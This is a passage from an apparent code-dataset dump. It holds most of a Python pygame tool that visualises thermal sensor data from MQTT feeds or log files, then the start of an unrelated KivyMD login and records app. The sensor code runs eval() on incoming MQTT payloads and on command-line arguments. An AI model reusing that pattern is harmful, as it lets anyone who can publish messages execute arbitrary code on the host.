value_range=(0., 1.),\n manager=manager)\n else:\n disp = pygame.display.set_mode(aspect)\n pygame.display.set_caption(f'butlr. {data_type} data analysis')\n\n sensors = list(addresses.keys())\n lo = 12\n hi = 45\n\n zero_matrix = np.zeros((8, 8))\n zero_matrix.fill(lo)\n\n if live:\n trajectory_topic = \"\"\n if wiwide:\n trajectory_topic = mqtt_in + \"_out\"\n _thread.start_new_thread(mqtt_processes, (mqtt_address, mqtt_in, mqtt_detections_in, trajectory_topic,\n mqtt_detections_out, mqtt_usn, mqtt_pwd))\n\n else:\n det_start_idx = {}\n for sensor in sensors: det_start_idx[sensor] = 0\n if not os.path.exists(data_path[:-4] + \"_sorted.txt\"):\n print(\"Sorting data by timestamp\")\n with open(data_path, \"r\") as f:\n unsorted0 = f.readlines()\n unsorted0.sort(key=lambda x: ast.literal_eval(x)['timestamp'])\n with open(data_path[:-4] + \"_sorted.txt\", \"w+\") as f:\n f.writelines(unsorted0)\n\n with open(data_path, \"r\") as f:\n text = f.readlines()\n if det_path:\n with open(det_path, \"r\") as f:\n det_text = f.readlines()\n text_line = 0\n\n post_path_out = \"\"\n if post:\n post_path_out = det_path[:-4] + \"_POST.txt\"\n _thread.start_new_thread(live_processing, (config_json_path, 3, None, detection_queue1,\n post_path_out, False))\n\n matrices = {}\n trajectories = {}\n traj_times = {}\n trajectory_tracking = \"\"\n last_traj_sensor = \"\"\n last_detections = {}\n last_detections_local = {}\n world_detections = []\n objects = {}\n\n for ad in sensors:\n matrices[ad] = zero_matrix\n last_detections[ad] = []\n last_detections_local[ad] = []\n\n real_time_delta = 0\n epoch = 0\n det_time = 0\n last_time = time.time()\n flag = None\n buffer = []\n\n yeehaw = False\n qt1 = time.time()\n qt_last = 0\n\n running = True\n if display != \"none\":\n if not live:\n _thread.start_new_thread(stream_text_data, (text, wiwide, fps, sensors, start_time,\n addresses, det_path, det_text, det_start_idx, post,\n end_time, post_path_out))\n while running:\n for event in pygame.event.get():\n # QUIT\n if event.type == pygame.QUIT:\n running = False\n # ESC: quit this scene\n if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n running = False\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n x = pos[0] / meterX\n y = ((aspect[1] - pos[1]) / meterY)\n \"\"\"if display == 'overlay' and y > 0:\n print(\"Pixels: \", pos)\n print(\"Meters: \", (x, y))\"\"\"\n\n if event.type == pygame.USEREVENT and not live:\n if event.user_type == pygame_gui.UI_HORIZONTAL_SLIDER_MOVED:\n # print(event.ui_element, playback)\n if 
event.ui_element == playback:\n text_line = int(len(text) * playback.get_current_value())\n playback.update(0.0001)\n # print(playback.get_current_value())\n if not live: manager.process_events(event)\n if not live: manager.update(1/fps)\n\n while len(data_queue) > 0:\n mqtt_packet_list = data_queue.popleft()\n for mqtt_packet in mqtt_packet_list:\n if (not wiwide or replaying) and \"fields\" in mqtt_packet.keys():\n utc = mqtt_packet['fields']['utcSecs']\n if not replaying:\n if real_time_delta == 0:\n real_time_delta = mqtt_packet['timestamp'] / 1000 - mqtt_packet['fields']['utcSecs']\n data = mqtt_packet['fields']['data'][6:]\n else:\n if real_time_delta == 0 and use_delta:\n real_time_delta = mqtt_packet['timestamp'] / 1000000 - mqtt_packet['fields']['utcSecs']\n epoch /= 1000\n data = mqtt_packet['fields']['data']\n id = mqtt_packet['fields']['macAddress']\n epoch = utc + real_time_delta\n elif wiwide:\n epoch = mqtt_packet['timestamp']\n id = mqtt_packet['deviceName']\n data = mqtt_packet['data']\n if \"flag\" in mqtt_packet.keys():\n flag = mqtt_packet['flag']\n\n data = [min(max(x, lo * 4), hi * 4) for x in data]\n if replaying: data = data[6:]\n if seamless or verizon or replaying:\n data = data[:-2]\n if len(data) != 64:\n print(f\"improper data length: {len(data)} != 64\")\n raise Exception\n data = np.asarray(data).reshape((8, 8)) * 0.25\n sensor = None\n for s in sensors:\n if addresses[s] == id:\n sensor = s\n if sensor is None: continue\n matrices[sensor] = np.array(data).T\n last_detections[sensor] = []\n last_detections_local[sensor] = []\n world_detections = []\n\n while len(detection_queue) > 0:\n skip = False\n detect_packet_list = detection_queue.popleft()\n for detect_packet in detect_packet_list:\n if not wiwide:\n det_time = detect_packet['utcSecs'] + real_time_delta\n else:\n det_time = detect_packet['timestamp']\n if replaying: det_time = detect_packet[\"timestamp\"] / 1000\n det_name = detect_packet['deviceName']\n det_local = detect_packet['detectionsLocal']\n det_world = detect_packet['detectionsWorld']\n\n sensor = None\n if not skip:\n for s in sensors:\n if addresses[s] == det_name:\n sensor = s\n if sensor is None: continue\n last_detections_local[sensor] = det_local\n last_detections[sensor] = det_world\n if 'detectionsWorld' in detect_packet.keys():\n world_detections.extend(detect_packet['detectionsWorld'])\n\n if len(traj_queue) > 0:\n in_n_out = {}\n trajectory = traj_queue.popleft()\n try:\n traj_stamp = trajectory['deviceName']\n trajectory_tracking = trajectory['timestamp']\n traj_str = \"trajectory\"\n in_n_out[traj_stamp] = (trajectory['in'], trajectory['out'])\n # print(datetime.fromtimestamp(trajectory_tracking / 1000000))\n except KeyError:\n traj_stamp = trajectory['DeviceName']\n trajectory_tracking = trajectory['Time']\n traj_str = \"Trajectory\"\n last_traj_sensor = f\"(Sensor ID: {traj_stamp})\"\n if traj_stamp not in trajectories.keys(): trajectories[traj_stamp] = []\n trajectories[traj_stamp].extend(trajectory[traj_str])\n traj_times[traj_stamp] = 0\n delete_times = []\n for s, t in traj_times.items():\n if t < 20:\n traj_times[s] += 1\n else:\n delete_times.append(s)\n for d in delete_times:\n del traj_times[d]\n del trajectories[d]\n\n while len(post_queue) > 0:\n objects_msg = post_queue.popleft()\n objects = {n: o for n, o in zip(objects_msg['detectionIDs'], objects_msg['detectionsWorld'])}\n ids = objects_msg['detectionIDs']\n\n qt2 = time.time()\n if int(qt2 - qt1) % 60 == 0 and not yeehaw: # Ignore this variable name. 
I was having fun.\n print(f\"Length of post queue at {datetime.fromtimestamp(qt2)}: {len(post_queue)}\")\n yeehaw = True\n qt_last = qt2\n if (time.time()) - qt_last > 10: yeehaw = False\n # det_time = objects_msg['timestamp'] / 1000\n # print(len(post_queue))\n\n if display == 'overlay':\n world_cd_surf = pygame.Surface(aspect, pygame.SRCALPHA, 32)\n world_cd_surf = world_cd_surf.convert_alpha()\n if show_graph:\n with open(graph_path, \"r\") as f:\n graph = json.load(f)\n with open(config_json_path, \"r\") as f:\n cf = json.load(f)\n walls = cf['coordinates'][0]['walls']\n for wall in walls:\n pt0 = [wall[0][0] * meterX, aspect_ratio[1] - (wall[0][1] * meterY)]\n pt1 = [wall[1][0] * meterX, aspect_ratio[1] - (wall[1][1] * meterY)]\n # print(pt0, pt1)\n pygame.draw.line(world_cd_surf, black, pt0, pt1, 1)\n for name, v in graph.items():\n node = v[0]\n pos = node['position']\n nbs = node['neighbors']\n pygame.draw.circle(world_cd_surf, black, (pos[0] * meterX, pos[1] * meterY), 2, width=0)\n for n in nbs:\n nb_pos = graph[str(n[0])][0]['position']\n pygame.draw.line(world_cd_surf, red, (pos[0] * meterX, aspect_ratio[1] - pos[1] * meterY),\n (nb_pos[0] * meterX, aspect_ratio[1] - nb_pos[1] * meterY), 1)\n\n disp.blit(world_cd_surf, (0, 0))\n\n assert floorplan is not None, \"A floor plan image file must be provided for the overlay visualization mode.\"\n\n for pt in exit_points:\n cd0 = int(pt[0] * meterX)\n cd1 = aspect_ratio[1] - int(pt[1] * meterY)\n pygame.draw.circle(world_cd_surf, black, (cd0, cd1), 8, width=1)\n img = pygame.image.load(floorplan)\n img = pygame.transform.scale(img, aspect)\n disp.blit(img, (0, 0))\n texts = {}\n for sensor, data in matrices.items():\n data = np.clip(data, lo + 0.01, hi - 0.01).copy()\n surf = pygame.surfarray.make_surface(gray(data, lo, hi))\n surf = pygame.transform.scale(surf, sizes[sensor])\n if objects:\n # print(objects)\n for pair in objects.values():\n cd0 = int((pair[0]) * meterX)\n cd1 = aspect_ratio[1] - int((pair[1]) * meterY)\n pygame.draw.circle(world_cd_surf, (0, 0, 255), (cd0, cd1), 10, width=1)\n if show_raw_detections:\n if show_det_local:\n for loc in last_detections_local[sensor]:\n cd0 = int(loc[0] * 7 * (sizes[sensor][0] / 8))\n cd1 = int(loc[1] * 7 * (sizes[sensor][1] / 8))\n pygame.draw.circle(surf, (255, 255, 0), (cd0, cd1), 10, width=1)\n for det in last_detections[sensor]:\n cd0 = int(det[0] * meterX)\n cd1 = aspect_ratio[1] - int(det[1] * meterY)\n pygame.draw.circle(world_cd_surf, red, (cd0, cd1), 8, width=1)\n surf = pygame.transform.rotate(surf, rotations[sensor])\n disp.blit(surf, positions[sensor])\n disp.blit(world_cd_surf, (0, 0))\n\n if post:\n obs = font.render(\"OBJECTS:\", True, black)\n obRect = obs.get_rect()\n obRect.topleft = (0, int(64 * scaleX))\n disp.blit(obs, obRect)\n start = 80\n gap = 20\n for k in range(len(objects)):\n cds = list(objects.values())[k]\n cd0 = np.around(cds[0], 2)\n cd1 = np.around(cds[1], 2)\n place = start + (k * gap)\n texts[k] = font.render(f\"Name: {ids[k]}, Coordinates: {(cd0, cd1)}\",\n True, black)\n textRect = texts[k].get_rect()\n textRect.topleft = (0, place * scaleX)\n disp.blit(texts[k], textRect)\n\n for text in texts.values(): text.fill(white)\n # plot last massage time\n if not replaying:\n nt = epoch\n else:\n nt = epoch * 1000\n try:\n stamp = datetime.fromtimestamp(nt)\n except ValueError:\n stamp = datetime.fromtimestamp(epoch)\n text0 = font.render(f'data time (GMT): {stamp}', True, black)\n textRect = text0.get_rect()\n textRect.topleft = (0, int(10 * scaleY))\n 
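# A recurring computation in the overlay-drawing code here is the world-to-screen
# mapping: meters are scaled by pixels-per-meter, and y is flipped because
# pygame's origin is the top-left corner while the floor plan's is the bottom-left.
# A tiny self-contained illustration; world_to_screen is a hypothetical helper
# name, the source inlines this arithmetic.
def world_to_screen(x_m, y_m, meter_x, meter_y, screen_h):
    # scale meters to pixels, then flip y so larger world-y draws nearer the top
    return int(x_m * meter_x), screen_h - int(y_m * meter_y)

assert world_to_screen(2.0, 1.0, meter_x=100, meter_y=100, screen_h=1000) == (200, 900)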
disp.blit(text0, textRect)\n\n # plot current time\n stamp = datetime.fromtimestamp(time.time())\n text1 = font.render(f'current time (GMT): {stamp}', True, black)\n textRect = text1.get_rect()\n textRect.topleft = (0, int(37 * scaleY))\n disp.blit(text1, textRect)\n\n # Plot last message time\n stamp = datetime.fromtimestamp(det_time)\n text2 = font.render(f'last detection time (GMT): {stamp}', True, black)\n textRect = text2.get_rect()\n textRect.topright = (aspect[0], int(10 * scaleY))\n disp.blit(text2, textRect)\n\n elif display == 'grid':\n transparent_surface = pygame.Surface(aspect, pygame.SRCALPHA, 32)\n transparent_surface = transparent_surface.convert_alpha()\n if post: warnings.warn(\"Post-processed detections will not be shown in the grid visualization mode\")\n if not trajectories: disp.fill(black)\n for idx, tup in enumerate(matrices.items()):\n deviceName = tup[0]\n name = deviceName\n data = tup[1]\n surf = pygame.surfarray.make_surface(gray(data, lo, hi))\n\n surf = pygame.transform.scale(surf, (box, box))\n if verizon: surf = pygame.transform.rotate(surf, rotation)\n x = box * (idx % grid_dimensions[0])\n y = box * (idx // grid_dimensions[0])\n\n pygame.draw.rect(transparent_surface, black, (x, y, box, box), width=1)\n if type(deviceName) is int: name = addresses[deviceName]\n text1 = font.render(f'{name}', True, black)\n textRect = text1.get_rect()\n textRect.topleft = (x + 3, y + 3)\n\n for cd in last_detections[deviceName]:\n cd0 = int(cd[0] * 7 * (grid_dimensions[2] / 8))\n cd1 = int(cd[1] * 7 * (grid_dimensions[2] / 8))\n pygame.draw.circle(surf, red, (cd0, cd1), box // 10, width=1)\n # pygame.draw.circle(surf, red, cd, box // 10, width=1)\n\n disp.blit(surf, (x, y))\n disp.blit(text1, textRect)\n\n if flag is not None:\n flag_text = font.render(f\"Flag: {flag}\", True, black)\n flagRect = flag_text.get_rect()\n flagRect.topleft = (x + 3, y + 3 + font_size)\n disp.blit(flag_text, flagRect)\n\n if trajectories:\n for k, traj in trajectories.items():\n color = [0, 0, 0]\n if in_n_out[k][0]:\n color[0] += 255\n if in_n_out[k][1]:\n color[2] += 255\n color = tuple(color)\n try:\n key = [idx for idx, x in enumerate(addresses.keys()) if addresses[x] == k][0]\n except IndexError:\n continue\n move_y = key // grid_dimensions[0]\n move_x = key % grid_dimensions[0]\n for j in range(len(traj)):\n trajectory = traj[j]\n for i in range(len(trajectory) - 1):\n p0 = (trajectory[i][0] * box + (box * move_x),\n trajectory[i][1] * box + (box * move_y))\n p1 = (trajectory[i + 1][0] * box + (box * move_x),\n trajectory[i + 1][1] * box + (box * move_y))\n pygame.draw.circle(transparent_surface, color, p0, 4, width=0)\n pygame.draw.line(transparent_surface, color, p0, p1, width=1)\n if i == len(trajectory) - 1:\n pygame.draw.circle(transparent_surface, color, p1, 4, width=0)\n\n disp.blit(transparent_surface, (0, 0))\n if wiwide:\n try:\n trajectory_tracking = datetime.fromtimestamp(int(trajectory_tracking) / 1000000)\n except:\n pass\n traj_text = font.render(f\"Last Trajectory: {trajectory_tracking} {last_traj_sensor}\",\n True, white, black)\n traj_rect = traj_text.get_rect()\n traj_rect.topleft = (0, height + 5)\n disp.blit(traj_text, traj_rect)\n\n data_time_text = font.render(f\"Data Time: {datetime.fromtimestamp(epoch)}\", True, white, black)\n dt_rect = data_time_text.get_rect()\n dt_rect.topleft = (0, height + 5 + font_size)\n\n disp.blit(data_time_text, dt_rect)\n\n if not live:\n manager.draw_ui(disp)\n current_pos = playback.get_current_value()\n if current_pos == 1: 
exit(0)\n pygame.display.update()\n\n clock.tick(100)\n time.sleep(0.001)\n\n\ndef stream_text_data(text, wiwide, fps, sensors, start_time,\n addresses, det_path, det_text, det_start_idx,\n post, end_time, post_path_out):\n global playback\n global text_line\n global data_queue\n last_time = time.time()\n buffer = []\n while True:\n time_check = time.time()\n if text[text_line][0] == \"b\": text[text_line] = text[text_line][1:]\n line_check = eval(text[text_line])\n if type(line_check) is not dict: line_check = ast.literal_eval(line_check)\n if not wiwide and line_check['name'] == \"notifData\":\n realtime = line_check['timestamp']\n timestamp = line_check['fields']['utcSecs']\n id = line_check['fields']['macAddress']\n elif wiwide:\n timestamp = line_check['timestamp']\n realtime = timestamp\n id = line_check['deviceName']\n else:\n text_line += 1\n continue\n sensor = None\n playback.set_current_value(text_line / len(text))\n playback.update(1 / fps)\n if realtime >= start_time:\n if time_check - last_time >= 1 / (4 * fps * len(sensors)):\n last_time = time_check\n if len(buffer) > 1:\n data_queue.append(buffer)\n buffer = []\n\n for s in sensors:\n if addresses[s] == id:\n sensor = s\n buffer.append(line_check)\n if det_path and sensor is not None:\n for t in range(det_start_idx[sensor], len(det_text)):\n packet = ast.literal_eval(det_text[t])\n if wiwide:\n time_unit = 'timestamp'\n else:\n time_unit = 'utcSecs'\n if packet['deviceName'] == id and packet[time_unit] == timestamp:\n if post: detection_queue1.append(packet)\n detection_queue.append([packet])\n det_start_idx[sensor] = t\n elif packet[time_unit] > timestamp:\n break\n elif realtime >= end_time:\n raise\n text_line += 1\n\n if post and os.path.exists(post_path_out):\n with open(post_path_out, \"r\") as post_file:\n post_text = post_file.readlines()\n for line in post_text:\n post_packet = eval(line)\n post_timestamp = post_packet['timestamp']\n if post_timestamp == timestamp:\n post_queue.append(post_packet)\n time.sleep(1 / (10*(fps * len(sensors))))\n\n\ndef _sizes_positions(config, meterX, meterY, aspect):\n cfg = config['sensors']\n positions = {}\n sizes = {}\n rotations = {}\n for sensor_dict in cfg:\n label = sensor_dict['label']\n\n center = sensor_dict['center']\n c0 = (center[0]) * meterX\n c1 = aspect[1] - ((center[1]) * meterY)\n\n dims = sensor_dict['coverage_dim']\n d0 = dims[0] * meterX\n d1 = dims[1] * meterY\n\n sizes[label] = (int(d0), int(d1))\n positions[label] = (int(c0 - (d0 / 2)), int(c1 - (d1 / 2)))\n try:\n rotations[label] = sensor_dict['rotation']\n except KeyError:\n rotations[label] = 0\n return sizes, positions, rotations\n\n\ndef mqtt_processes(address, topic_raw_in, topic_detect_in, traj_topic, topic_post_in, usn, pw):\n global data_queue\n global detection_queue\n global traj_queue\n global post_queue\n global client\n global bufferMQ\n global sensor_timer\n global det_buffer\n global in_count\n global out_count\n in_count = 0\n out_count = 0\n bufferMQ = []\n det_buffer = []\n sensor_timer = \"\"\n\n def on_subscribe(client, userdata, mid, granted_qos):\n print(\"Subscribed: \" + str(mid) + \" \" + str(granted_qos))\n\n def on_message(client, userdata, msg):\n global bufferMQ\n global sensor_timer\n global det_buffer\n global in_count\n global out_count\n try:\n # message = json.loads(msg.payload)\n message = eval(msg.payload)\n\n # GENERAL CONDITION\n if list(message.keys())[0] == 'fields':\n if message['name'] == 'notifData':\n bufferMQ.append(message)\n # print(\"BUFFER:\", 
len(bufferMQ))\n if not sensor_timer:\n sensor_timer = message['fields']['macAddress']\n if message['fields']['macAddress'] == sensor_timer or len(bufferMQ) > 1:\n data_queue.append(bufferMQ)\n # print(\"QUEUE:\", len(data_queue))\n bufferMQ = []\n # WIWIDE CONDITION\n if list(message.keys())[0] == \"flag\":\n data_queue.append([message])\n\n elif \"lostIDs\" in message.keys():\n # print(\"post detection\")\n post_queue.append(message)\n\n elif any([x in message.keys() for x in ['deviceName', 'DeviceName', 'detectionsLocal']]):\n if any([p in message.keys() for p in ['trajectory', \"Trajectory\"]]):\n traj_queue.append(message)\n in_count += message['in']\n out_count += message['out']\n print(f\"TOTAL IN: {in_count} \\nTOTAL OUT: {out_count}\\n\")\n else:\n if len(message['detectionsLocal']) > 0:\n detection_queue.append([message])\n detection_queue1.append([message])\n\n except Exception as e:\n print('\\n========================================================================')\n exc_type, exc_obj, exc_tb = sys.exc_info()\n print('Error type: {}, happened on line {} in '.format(exc_type, exc_tb.tb_lineno))\n print('Error: {}'.format(e))\n print('========================================================================\\n')\n\n client.username_pw_set(usn, pw)\n client.on_subscribe = on_subscribe\n client.on_message = on_message\n client.connect(address, 1883)\n client.subscribe(topic_raw_in, qos=1)\n if topic_detect_in: client.subscribe(topic_detect_in, qos=1)\n if traj_topic: client.subscribe(traj_topic, qos=1)\n if topic_post_in: client.subscribe(topic_post_in, qos=1)\n client.loop_forever()\n\n\ndef sensor_count(path):\n sensor_ids = []\n with open(path, 'r') as f:\n text = f.readlines()\n for i in range(len(text)):\n try:\n if text[i][0] == \"b\": text[i] = text[i][1:]\n input_dict = ast.literal_eval(text[i])\n if type(input_dict) is not dict: input_dict = ast.literal_eval(input_dict)\n if \"fields\" in input_dict.keys():\n name = input_dict['fields']['macAddress']\n else:\n name = input_dict['deviceName']\n if name not in sensor_ids:\n sensor_ids.append(name)\n except Exception as e:\n print(e)\n continue\n return sensor_ids\n\n\ndef separate_sensors(path, sensor_ids):\n sections = {}\n with open(path, 'r') as f:\n text = f.readlines()\n\n for line in text:\n d = ast.literal_eval(line)\n name = d['deviceName']\n if name not in sections.keys():\n sections[name] = []\n sections[name].append(line)\n\n paths = {}\n for sensor in sensor_ids:\n with open(path[:-4] + '_' + sensor + \".txt\", 'w') as f:\n f.writelines(sections[sensor])\n paths[sensor] = path[:-4] + '_' + sensor + \".txt\"\n return paths\n\n\ndef data_converter(inputfile: str, outputfile: str):\n with open(inputfile, 'r') as f:\n lines = f.readlines()\n with open(outputfile, 'w') as f:\n for line in lines:\n if line[0] == \"b\": line = line[1:]\n line = ast.literal_eval(line)\n if type(line) is not str:\n line = str(line)\n data: dict = eval(line)\n fields: dict | int = data.get('fields', 0)\n if fields != 0:\n data_inside = fields.get('data', 0)\n if data_inside != 0:\n json.dump({'data': data_inside[6:70],\n 'deviceName': fields['macAddress'],\n 'thermistor': int.from_bytes(data_inside[4:6], 'little'),\n 'timestamp': data['timestamp'],\n 'utcUsecs': data['fields']['utcUsecs'],\n 'utcSecs': data['fields']['utcSecs']}, f)\n f.write('\\n')\n\n\ndef gray(im, lo, hi):\n lo_pot = np.percentile(im, 2) - 3\n hi_pot = np.percentile(im, 99) + 7\n if lo_pot < lo:\n lo = lo_pot\n if hi_pot > hi:\n hi = hi_pot\n im = ((255 / (hi - lo)) * 
im) - lo\n w, h = im.shape\n ret = np.empty((w, h, 3), dtype=np.uint8)\n ret[:, :, 2] = ret[:, :, 1] = ret[:, :, 0] = im\n return ret\n\n\ndef bw(surf, arr):\n width, height = surf.get_size()\n for i in range(width):\n for j in range(height):\n if arr[i, j]:\n surf.set_at((i, j), (255, 255, 255))\n return surf\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-config\", default=\"\")\n parser.add_argument(\"-fp\", default=\"\")\n\n parser.add_argument(\"-ad\", default=\"None\")\n parser.add_argument(\"-live\", default=\"f\")\n\n parser.add_argument(\"-disp\", default=\"grid\")\n parser.add_argument(\"-ar\", default=\"(1000, 1000)\")\n parser.add_argument(\"-gd\", default=\"None\")\n parser.add_argument(\"-fps\", default=\"10\")\n parser.add_argument(\"-start\", default=\"0\")\n parser.add_argument(\"-end\", default=\"np.inf\")\n\n parser.add_argument(\"-data\", default=\"\")\n parser.add_argument(\"-det\", default=\"\")\n parser.add_argument(\"-post\", default=\"f\")\n parser.add_argument(\"-cvt\", default=\"f\")\n\n parser.add_argument(\"-shgr\", default=\"f\")\n parser.add_argument(\"-gp\", default=\"\")\n\n parser.add_argument('-mqad', default=\"\")\n parser.add_argument('-mqus', default=\"\")\n parser.add_argument('-mqpw', default=\"\")\n parser.add_argument('-mqri', default=\"\")\n parser.add_argument('-mqop', default=\"\")\n parser.add_argument('-mqdi', default=\"\")\n parser.add_argument('-mqdo', default=\"\")\n\n parser.add_argument(\"-rp\", default=\"f\")\n parser.add_argument(\"-rot\", default=\"0\")\n parser.add_argument(\"-srd\", default=\"t\")\n\n parser.add_argument(\"-sld\", default=\"f\")\n parser.add_argument(\"-delta\", default=\"t\")\n\n args = parser.parse_args()\n\n global show_det_local\n global use_delta\n use_delta = args.delta == \"t\"\n show_det_local = args.sld == \"t\"\n\n config = args.config\n floorplan = args.fp\n\n address_dict = eval(args.ad)\n live = (args.live == \"t\")\n\n disp = args.disp\n aspect = eval(args.ar)\n grid_dims = eval(args.gd)\n fps = eval(args.fps)\n start = eval(args.start)\n end = eval(args.end)\n\n data_path = args.data\n det_path = args.det\n post = (args.post == \"t\")\n convert = args.cvt\n\n show_graph = args.shgr == \"t\"\n graph_path = args.gp\n\n replay = args.rp == \"t\"\n rotation = eval(args.rot)\n srd = args.srd == \"t\"\n\n mqad = args.mqad\n mqus = args.mqus\n mqpw = args.mqpw\n mqri = args.mqri\n mqdi = args.mqdi\n mqdo = args.mqdo\n mqop = args.mqop\n\n analyze(config_json_path=config, floorplan=floorplan, address_dict=address_dict, live=live, start_time=start,\n end_time=end, display=disp, aspect_ratio=aspect, grid_dimensions=grid_dims, data_path=data_path, fps=fps,\n replaying=replay, det_path=det_path, post=post, convert=convert, mqtt_address=mqad, show_graph=show_graph,\n graph_path=graph_path, mqtt_usn=mqus, mqtt_pwd=mqpw, mqtt_in=mqri, rotation=rotation,\n mqtt_detections_in=mqdi, mqtt_detections_out=mqdo, mqtt_out=mqop, show_raw_detections=srd)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SidharthAnand/visualization","sub_path":"archive/analysis_general.py","file_name":"analysis_general.py","file_ext":"py","file_size_in_byte":39895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72510829482","text":"from kivymd.app import MDApp\r\nfrom kivy.uix.button import Button\r\nfrom kivymd.uix.button import MDFlatButton\r\nfrom kivy.uix.screenmanager import Screen, ScreenManager\r\nfrom kivymd.uix.screen import 
MDScreen\r\nfrom kivy.clock import Clock\r\nfrom kivy.uix.widget import Widget\r\nfrom kivymd.uix.dialog import MDDialog\r\nfrom kivy.uix.textinput import TextInput\r\nfrom kivy.config import Config\r\nfrom kivymd.uix.label import MDLabel\r\nfrom kivy.core.window import Window\r\nfrom kivy.lang import Builder\r\nimport sqlite3\r\nfrom kivymd.uix.datatables import MDDataTable\r\nfrom kivy.metrics import dp\r\nfrom plyer import filechooser\r\nfrom kivy.uix.anchorlayout import AnchorLayout\r\n\r\ns = \"\"\"\r\nScreenManager:\r\n MenuScreen:\r\n ProfileScreen:\r\n UploadScreen:\r\n LoginScreen:\r\n SignupScreen:\r\n ClientsTable:\r\n firstpage:\r\n:\r\n name: 'menu'\r\n MDRectangleFlatButton:\r\n text: 'Profile'\r\n pos_hint: {'center_x':0.5,'center_y':0.6}\r\n on_press: root.manager.current = 'new'\r\n MDRectangleFlatButton:\r\n text: 'Upload'\r\n pos_hint: {'center_x':0.5,'center_y':0.5}\r\n on_press: root.manager.current = 'Clientstable'\r\n MDRectangleFlatButton:\r\n text: 'backlogin'\r\n pos_hint: {'center_x':0.5,'center_y':0.4}\r\n on_press: root.manager.current = 'login'\r\n:\r\n name: 'profile'\r\n MDLabel:\r\n text: 'Profile'\r\n halign: 'center'\r\n MDRectangleFlatButton:\r\n text: 'Back'\r\n pos_hint: {'center_x':0.5,'center_y':0.1}\r\n on_press: root.manager.current = 'menu' \r\n:\r\n name: 'upload'\r\n BoxLayout:\r\n orientation: 'vertical'\r\n MDToolbar:\r\n title: 'Entered'\r\n left_action_items: [[\"menu\", lambda x: app.navigation_draw()]]\r\n right_action_items: [[\"dots-vertical\", lambda x: app.callback()], [\"clock\", lambda x: app.callback_2()]]\r\n elevation:5\r\n\r\n MDLabel:\r\n text: 'hello world'\r\n halign: 'center'\r\n MDBottomAppBar:\r\n MDToolbar:\r\n title: 'Demo'\r\n icon: 'language-python'\r\n type: 'bottom'\r\n left_action_items: [[\"coffee\", lambda x: app.navigation_draw()]]\r\n on_action_button: root.manager.current = 'menu' \r\n\r\n\r\n\r\n:\r\n name:\"login\"\r\n MDFloatLayout:\r\n\r\n MDTextField:\r\n id:email\r\n hint_text: \"Enter username\"\r\n helper_text: \"or click on forgot username\"\r\n helper_text_mode: \"on_focus\"\r\n icon_right: \"android\"\r\n icon_right_color: app.theme_cls.primary_color\r\n pos_hint:{'center_x': 0.5, 'center_y': 0.7}\r\n size_hint_x:None\r\n width:300\r\n\r\n MDTextField:\r\n id:password\r\n hint_text: \"Enter password\"\r\n helper_text: \"or click on forgot password\"\r\n helper_text_mode: \"on_focus\"\r\n icon_right: \"lock\"\r\n icon_right_color: app.theme_cls.primary_color\r\n pos_hint:{'center_x': 0.5, 'center_y': 0.58}\r\n size_hint_x:None\r\n width:300\r\n MDRaisedButton:\r\n text:\"LOGIN\"\r\n pos_hint:{'center_x': 0.6, 'center_y': 0.5}\r\n md_bg_color: 1, 0, 1, 1\r\n on_press:app.log()\r\n MDRaisedButton:\r\n text:\"SIGNUP\"\r\n pos_hint:{'center_x': 0.4, 'center_y': 0.5}\r\n md_bg_color: 1, 0, 1, 1\r\n on_press:root.manager.current = 'signup' \r\n:\r\n name: 'signup'\r\n MDFloatLayout:\r\n\r\n MDTextField:\r\n id:email\r\n hint_text: \"Enter username\"\r\n helper_text: \"or click on forgot username\"\r\n helper_text_mode: \"on_focus\"\r\n icon_right: \"android\"\r\n icon_right_color: app.theme_cls.primary_color\r\n pos_hint:{'center_x': 0.5, 'center_y': 0.7}\r\n size_hint_x:None\r\n width:300\r\n\r\n MDTextField:\r\n id:password\r\n hint_text: \"Enter password\"\r\n helper_text: \"or click on forgot password\"\r\n helper_text_mode: \"on_focus\"\r\n icon_right: \"lock\"\r\n icon_right_color: app.theme_cls.primary_color\r\n pos_hint:{'center_x': 0.5, 'center_y': 0.58}\r\n size_hint_x:None\r\n width:300\r\n 
MDRaisedButton:\r\n text:\"SIGNUP\"\r\n pos_hint:{'center_x': 0.6, 'center_y': 0.5}\r\n md_bg_color: 1, 0, 1, 1\r\n on_press:app.create() \r\n MDRaisedButton:\r\n text: 'Backlogin'\r\n pos_hint: {'center_x':0.4,'center_y':0.5}\r\n md_bg_color: 1, 0, 1, 1\r\n on_press: root.manager.current = 'login'\r\n:\r\n name:'new'\r\n \r\n MDBoxLayout:\r\n id: main_layout\r\n orientation: 'vertical'\r\n padding: dp(20)\r\n\r\n MDLabel:\r\n text: \"Records Manager\"\r\n font_size: dp(20)\r\n halign: 'center'\r\n padding_y: dp(20)\r\n size_hint_y: None\r\n height: self.texture_size[1]\r\n\r\n MDGridLayout:\r\n adaptive_height: True\r\n cols: 2\r\n MDBoxLayout:\r\n MDLabel:\r\n text: \"Record Id\"\r\n MDLabel:\r\n id: record_id\r\n text: ''\r\n Widget:\r\n\r\n MDTextField:\r\n id: matter_name\r\n hint_text: \"Matter Name\"\r\n\r\n MDTextField:\r\n id: file_name\r\n hint_text: \"File name\"\r\n\r\n MDTextField:\r\n id: description\r\n hint_text: \"Description\"\r\n\r\n MDTextField:\r\n id: location\r\n hint_text: \"Location\"\r\n\r\n MDBoxLayout:\r\n adaptive_height: True\r\n spacing: dp(50)\r\n padding: dp(20)\r\n\r\n MDRectangleFlatButton:\r\n text: \"Clear Form\"\r\n on_press: app.clear_form()\r\n\r\n MDRectangleFlatButton:\r\n text: \"Add Record\"\r\n on_press: app.add_record()\r\n\r\n MDRectangleFlatButton:\r\n text: \"Update Record\"\r\n on_press: app.update_record()\r\n\r\n MDRectangleFlatButton:\r\n text: \"Delete Record\"\r\n on_press:root.manager.current = 'Clientstable' \r\n\r\n\r\n:\r\n name: 'Clientstable'\r\n\r\n\r\n\r\n \"\"\"\r\nLO = '''\r\nMDScreen:\r\n name:\"pre\"\r\n MDFloatLayout:\r\n md_bg_color: 115/255.0, 62/255.0, 198/255.0, 1\r\n MDLabel:\r\n text:\"Welcome\"\r\n pos_hint:{\"center_x\": .5, \"center_y\": .2}\r\n 